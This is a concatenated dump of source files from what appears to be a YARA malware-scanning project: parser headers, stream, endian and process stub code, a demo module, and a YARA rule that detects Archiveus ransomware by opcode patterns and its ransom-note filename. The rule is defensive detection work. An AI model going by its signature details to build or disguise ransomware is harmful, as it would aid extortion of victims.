12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 20 | */ 21 | 22 | #ifndef AUTHENTICODE_PARSER_CERTIFICATE_H 23 | #define AUTHENTICODE_PARSER_CERTIFICATE_H 24 | 25 | #include 26 | 27 | #include 28 | 29 | #ifdef __cplusplus 30 | extern "C" { 31 | #endif 32 | 33 | Certificate* certificate_new(X509* x509); 34 | Certificate* certificate_copy(Certificate* cert); 35 | void certificate_free(Certificate* cert); 36 | 37 | void parse_x509_certificates(const STACK_OF(X509) * certs, CertificateArray* result); 38 | 39 | CertificateArray* parse_signer_chain(X509* signer_cert, STACK_OF(X509) * certs); 40 | int certificate_array_move(CertificateArray* dst, CertificateArray* src); 41 | int certificate_array_append(CertificateArray* dst, CertificateArray* src); 42 | CertificateArray* certificate_array_new(int certCount); 43 | void certificate_array_free(CertificateArray* arr); 44 | 45 | #ifdef __cplusplus 46 | } 47 | #endif 48 | 49 | #endif 50 | -------------------------------------------------------------------------------- /src/lib/stream.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2015. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. 
Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/

#include 
#include 


// Asks the stream's read callback for `count` items of `size` bytes each,
// storing them at `ptr` and forwarding the stream's user_data. The value
// the callback returns is passed straight back; a stream with no read
// callback yields 0.
size_t yr_stream_read(void* ptr, size_t size, size_t count, YR_STREAM* stream)
{
  if (stream->read != NULL)
    return stream->read(ptr, size, count, stream->user_data);

  return 0;
}


// Hands `count` items of `size` bytes each from `ptr` to the stream's write
// callback, forwarding the stream's user_data. The value the callback
// returns is passed straight back; a stream with no write callback yields 0.
size_t yr_stream_write(
    const void* ptr,
    size_t size,
    size_t count,
    YR_STREAM* stream)
{
  if (stream->write != NULL)
    return stream->write(ptr, size, count, stream->user_data);

  return 0;
}
-------------------------------------------------------------------------------- /src/lib/include/tlshc/tlsh.h: -------------------------------------------------------------------------------- 1 | #ifndef __TLSH_TLSH_H__ 2 | #define __TLSH_TLSH_H__ 3 | 4 | #include 5 | 6 | #define TLSH_OPTION_CONSERVATIVE 2 7 | #define TLSH_OPTION_KEEP_BUCKET 4 8 | #define TLSH_OPTION_PRIVATE 8 9 | #define TLSH_OPTION_THREADED 16 10 | 11 | // Define TLSH_STRING_LEN_REQ, which is the string length of "T1" + the hex 12 | // value of the Tlsh hash. 
BUCKETS_256 & CHECKSUM_3B are compiler switches 13 | // defined in CMakeLists.txt 14 | #if defined BUCKETS_256 15 | #define TLSH_STRING_LEN_REQ 136 16 | // changed the minimum data length to 256 for version 3.3 17 | #define MIN_DATA_LENGTH 50 18 | // added the -force option for version 3.5 19 | // added the -conservative option for version 3.17 20 | #define MIN_CONSERVATIVE_DATA_LENGTH 256 21 | #endif 22 | 23 | #if defined BUCKETS_128 24 | #define TLSH_STRING_LEN_REQ 72 25 | // changed the minimum data length to 256 for version 3.3 26 | #define MIN_DATA_LENGTH 50 27 | // added the -force option for version 3.5 28 | // added the -conservative option for version 3.17 29 | #define MIN_CONSERVATIVE_DATA_LENGTH 256 30 | #endif 31 | 32 | #if defined BUCKETS_48 33 | // No 3 Byte checksum option for 48 Bucket min hash 34 | #define TLSH_STRING_LEN 30 35 | // changed the minimum data length to 256 for version 3.3 36 | #define MIN_DATA_LENGTH 10 37 | // added the -force option for version 3.5 38 | #define MIN_CONSERVATIVE_DATA_LENGTH 10 39 | #endif 40 | 41 | #define TLSH_STRING_BUFFER_LEN (TLSH_STRING_LEN_REQ + 1) 42 | 43 | #ifdef __cplusplus 44 | extern "C" { 45 | #endif 46 | 47 | typedef struct TlshImpl TlshImpl; 48 | 49 | typedef struct { 50 | TlshImpl* impl; 51 | } Tlsh; 52 | 53 | Tlsh* tlsh_new(); 54 | void tlsh_free(Tlsh* tlsh); 55 | void tlsh_reset(Tlsh* tlsh); 56 | int tlsh_update(Tlsh* tlsh, const unsigned char* data, unsigned int len); 57 | int tlsh_final(Tlsh* tlsh, const unsigned char* data, unsigned int len, int tlsh_option); 58 | const char* tlsh_get_hash(Tlsh* tlsh, bool showvers); 59 | 60 | #ifdef __cplusplus 61 | } 62 | #endif 63 | 64 | #endif // __TLSH_TLSH_H__ -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/countersignature.h: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, 
free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 
*/

#ifndef AUTHENTICODE_PARSER_COUNTERSIGNATURE_H
#define AUTHENTICODE_PARSER_COUNTERSIGNATURE_H

#include "certificate.h"
#include "helper.h"
#include
#include
#include

#include
#include

#ifdef __cplusplus
extern "C" {
#endif

/* Parses a PKCS#9-style countersignature (as the name indicates) from the
 * `size` bytes at `data`. `certs` and `enc_digest` (the primary signature's
 * encrypted digest) are passed through to the parser; the exact verification
 * performed lives in countersignature.c and is not visible here.
 * NOTE(review): `size` is a signed long; the implementation must reject
 * negative values before using it as a length. The input is attacker
 * controlled (it comes from the PE being scanned), so every offset derived
 * from `data` needs a bounds check against `size`. Presumably returns NULL on
 * failure and a heap object to release with countersignature_free — confirm. */
Countersignature* pkcs9_countersig_new(
    const uint8_t* data, long size, STACK_OF(X509) * certs, ASN1_STRING* enc_digest);
/* Parses a Microsoft-style countersignature (as the name indicates) from the
 * `size` bytes at `data`; same signedness and bounds caveats as above. */
Countersignature* ms_countersig_new(const uint8_t* data, long size, ASN1_STRING* enc_digest);

/* Appends sig to arr. Presumably takes ownership of sig — confirm in
 * countersignature.c before freeing sig on the caller side. */
int countersignature_array_insert(CountersignatureArray* arr, Countersignature* sig);
/* Moves all countersignatures of src and inserts them into dst */
int countersignature_array_move(CountersignatureArray* dst, CountersignatureArray* src);

/* Releases one countersignature / a whole array, respectively. */
void countersignature_free(Countersignature* sig);
void countersignature_array_free(CountersignatureArray* arr);

#ifdef __cplusplus
}
#endif

#endif
--------------------------------------------------------------------------------
/src/lib/include/yara/scan.h:
--------------------------------------------------------------------------------
/*
Copyright (c) 2014. The YARA Authors. All Rights Reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_SCAN_H 31 | #define YR_SCAN_H 32 | 33 | #include 34 | 35 | // 36 | // Flags used with yr_scanner_set_flags and yr_rules_scan_xxx functions. 37 | // 38 | #define SCAN_FLAGS_FAST_MODE 1 39 | #define SCAN_FLAGS_PROCESS_MEMORY 2 40 | #define SCAN_FLAGS_NO_TRYCATCH 4 41 | #define SCAN_FLAGS_REPORT_RULES_MATCHING 8 42 | #define SCAN_FLAGS_REPORT_RULES_NOT_MATCHING 16 43 | 44 | int yr_scan_verify_match( 45 | YR_SCAN_CONTEXT* context, 46 | YR_AC_MATCH* ac_match, 47 | const uint8_t* data, 48 | size_t data_size, 49 | uint64_t data_base, 50 | size_t offset); 51 | 52 | #endif 53 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Archiveus.yara: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule Win32_Ransomware_Archiveus : tc_detection malicious 4 | { 5 | meta: 6 | 7 | author = "ReversingLabs" 8 | 9 | source = "ReversingLabs" 10 | status = "RELEASED" 11 | sharing = "TLP:WHITE" 12 | category = "MALWARE" 13 | malware = "ARCHIVEUS" 14 | description = "Yara rule that detects Archiveus ransomware." 
15 | 16 | tc_detection_type = "Ransomware" 17 | tc_detection_name = "Archiveus" 18 | tc_detection_factor = 5 19 | 20 | strings: 21 | 22 | $entry_point = { 23 | 68 ?? ?? 40 00 E8 ?? ?? ?? FF 24 | } 25 | 26 | $dump_instruction = { 27 | 8B 3D ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 28 | 74 ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ?? 29 | 50 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 30 | ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D7 FF 15 ?? ?? ?? ?? E9 ?? ?? 31 | ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? 32 | ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 50 51 FF D3 50 8D 55 ?? 8D 33 | 45 ?? 52 50 FF D3 50 FF 15 34 | } 35 | 36 | $extension_rule = { 37 | 8B 13 6A ?? 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? D9 85 ?? ?? ?? ?? DB 85 ?? ?? ?? 38 | ?? DD 9D ?? ?? ?? ?? DC 8D ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? 39 | ?? DC 05 ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 89 45 40 | ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 41 | 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ?? 42 | 50 6A ?? 6A ?? 6A ?? FF 15 43 | } 44 | 45 | $instruction_string = "INSTRUCTIONS HOW TO GET YOUR FILES BACK.txt" wide 46 | 47 | condition: 48 | uint16(0) == 0x5A4D and ($entry_point at pe.entry_point) and $dump_instruction and $extension_rule and $instruction_string 49 | 50 | } -------------------------------------------------------------------------------- /src/lib/modules/demo/demo.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2014. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. 
Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
28 | */ 29 | 30 | #include 31 | 32 | #define MODULE_NAME demo 33 | 34 | begin_declarations 35 | declare_string("greeting"); 36 | end_declarations 37 | 38 | 39 | int module_initialize(YR_MODULE* module) 40 | { 41 | return ERROR_SUCCESS; 42 | } 43 | 44 | 45 | int module_finalize(YR_MODULE* module) 46 | { 47 | return ERROR_SUCCESS; 48 | } 49 | 50 | 51 | int module_load( 52 | YR_SCAN_CONTEXT* context, 53 | YR_OBJECT* module_object, 54 | void* module_data, 55 | size_t module_data_size) 56 | { 57 | yr_set_string("Hello World!", module_object, "greeting"); 58 | 59 | return ERROR_SUCCESS; 60 | } 61 | 62 | 63 | int module_unload(YR_OBJECT* module_object) 64 | { 65 | return ERROR_SUCCESS; 66 | } 67 | -------------------------------------------------------------------------------- /src/lib/include/yara/mem.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_MEM_H 31 | #define YR_MEM_H 32 | 33 | #include 34 | #include 35 | 36 | #ifdef DMALLOC 37 | 38 | #define yr_malloc malloc 39 | #define yr_calloc calloc 40 | #define yr_realloc realloc 41 | #define yr_free free 42 | #define yr_strdup strdup 43 | #define yr_strndup strndup 44 | 45 | #include 46 | 47 | #else 48 | 49 | void* yr_calloc(size_t count, size_t size); 50 | 51 | void* yr_malloc(size_t size); 52 | 53 | void* yr_realloc(void* ptr, size_t size); 54 | 55 | char* yr_strdup(const char* str); 56 | 57 | char* yr_strndup(const char* str, size_t n); 58 | 59 | YR_API void yr_free(void* ptr); 60 | 61 | #endif 62 | 63 | int yr_heap_alloc(void); 64 | 65 | int yr_heap_free(void); 66 | 67 | #endif 68 | -------------------------------------------------------------------------------- /src/lib/include/yara/stream.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2015. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. 
Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
28 | */ 29 | 30 | #ifndef YR_STREAM_H 31 | #define YR_STREAM_H 32 | 33 | #include 34 | 35 | typedef size_t (*YR_STREAM_READ_FUNC)( 36 | void* ptr, 37 | size_t size, 38 | size_t count, 39 | void* user_data); 40 | 41 | typedef size_t (*YR_STREAM_WRITE_FUNC)( 42 | const void* ptr, 43 | size_t size, 44 | size_t count, 45 | void* user_data); 46 | 47 | typedef struct _YR_STREAM 48 | { 49 | void* user_data; 50 | 51 | YR_STREAM_READ_FUNC read; 52 | YR_STREAM_WRITE_FUNC write; 53 | 54 | } YR_STREAM; 55 | 56 | size_t yr_stream_read(void* ptr, size_t size, size_t count, YR_STREAM* stream); 57 | 58 | size_t yr_stream_write( 59 | const void* ptr, 60 | size_t size, 61 | size_t count, 62 | YR_STREAM* stream); 63 | 64 | #endif 65 | -------------------------------------------------------------------------------- /src/lib/endian.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2017. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

#include

// Byte-order reversal helpers. Each returns its argument with the byte order
// reversed, so applying the same function twice yields the original value.
// They touch no shared state. (The leading-underscore names are kept for
// compatibility with the project headers; at file scope such identifiers are
// formally reserved by the C standard, so new code should not copy the
// pattern.)

// Reverse the two bytes of a 16-bit value.
uint16_t _yr_bswap16(uint16_t x)
{
  // The shifts happen in int after integer promotion; the casts only make
  // the intended 16-bit result explicit.
  uint16_t upper_moved_down = (uint16_t) (x >> 8);
  uint16_t lower_moved_up = (uint16_t) (x << 8);
  return (uint16_t) (upper_moved_down | lower_moved_up);
}

// Reverse the four bytes of a 32-bit value.
uint32_t _yr_bswap32(uint32_t x)
{
  // Two rounds: swap neighbouring bytes, then swap the 16-bit halves.
  uint32_t v = x;
  v = ((v & 0x00ff00ffu) << 8) | ((v & 0xff00ff00u) >> 8);
  v = (v << 16) | (v >> 16);
  return v;
}

// Reverse the eight bytes of a 64-bit value.
uint64_t _yr_bswap64(uint64_t x)
{
  // Three rounds: swap bytes, then 16-bit units, then the 32-bit halves.
  uint64_t v = x;
  v = ((v & 0x00ff00ff00ff00ffull) << 8) | ((v & 0xff00ff00ff00ff00ull) >> 8);
  v = ((v & 0x0000ffff0000ffffull) << 16) | ((v & 0xffff0000ffff0000ull) >> 16);
  v = (v << 32) | (v >> 32);
  return v;
}
--------------------------------------------------------------------------------
/src/lib/proc/none.c:
--------------------------------------------------------------------------------
/*
Copyright (c) 2007-2017. The YARA Authors. All Rights Reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.

2.
Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
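*/

#if defined(USE_NO_PROC)

#include
#include

// Stub process-memory backend compiled in when process scanning is disabled
// (USE_NO_PROC). Every entry point reports "no process / no memory" so that
// callers take their ordinary error and end-of-iteration paths.

// Attaching to a process is never possible on this backend.
int _yr_process_attach(int pid, YR_PROC_ITERATOR_CTX* context)
{
  (void) pid;
  (void) context;
  return ERROR_COULD_NOT_ATTACH_TO_PROCESS;
}

// Nothing can ever have been attached, so detaching is an invalid request.
int _yr_process_detach(YR_PROC_ITERATOR_CTX* context)
{
  (void) context;
  return ERROR_INVALID_ARGUMENT;
}

// No block ever carries data on this backend.
YR_API const uint8_t* yr_process_fetch_memory_block_data(YR_MEMORY_BLOCK* block)
{
  (void) block;
  return NULL;
}

YR_API YR_MEMORY_BLOCK* yr_process_get_next_memory_block(
    YR_MEMORY_BLOCK_ITERATOR* iterator)
{
  // NULL together with last_error == ERROR_SUCCESS means "no more blocks",
  // not a failure.
  iterator->last_error = ERROR_SUCCESS;
  return NULL;
}

YR_API YR_MEMORY_BLOCK* yr_process_get_first_memory_block(
    YR_MEMORY_BLOCK_ITERATOR* iterator)
{
  // Report end-of-blocks the same way yr_process_get_next_memory_block does.
  // Previously last_error was left untouched here, so a caller inspecting it
  // after the NULL return could observe stale iterator state.
  iterator->last_error = ERROR_SUCCESS;
  return NULL;
}

#endif
--------------------------------------------------------------------------------
/src/lib/include/yara/proc.h:
--------------------------------------------------------------------------------
/*
Copyright (c) 2007. The YARA Authors. All Rights Reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.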
